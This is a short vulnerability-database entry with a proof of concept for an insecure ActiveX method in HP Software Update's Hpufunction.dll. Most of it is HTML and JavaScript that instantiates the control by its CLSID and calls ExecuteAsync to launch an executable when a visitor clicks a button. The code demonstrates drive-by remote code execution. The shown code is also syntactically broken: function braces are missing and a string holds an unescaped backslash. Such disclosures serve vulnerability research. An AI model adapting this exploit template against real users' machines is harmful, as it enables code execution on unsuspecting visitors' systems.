HP Software Update (Hpufunction.dll Insecure Method PoC

ID SSV:8379
Type seebug
Reporter Root
Modified 2008-04-28T00:00:00


No description provided by source.

Insecure Methods in HP Update Software.
Remote: Yes
Execute code remotely is possible using methods ExecuteAsync and Execute  :-) 
If a user visits the malicious page the attacker can execute code.
Coded by callAX

Proof of Concept

<object id=boom classid="clsid:{B00FBC78-73CB-4216-8D01-96770CC020C3}"></object>
<SCRIPT language="javascript">

function Do_it()
  var Please = "c:\windows\system32\calc.exe"
  var Give = "doest_matter"
  var Me = "c:\"
  var Freedom  = 1;

  boom.ExecuteAsync (Please, Give, Me ,Freedom);

<input language=JavaScript onclick=Do_it() type=button value="Poc">

# sebug.net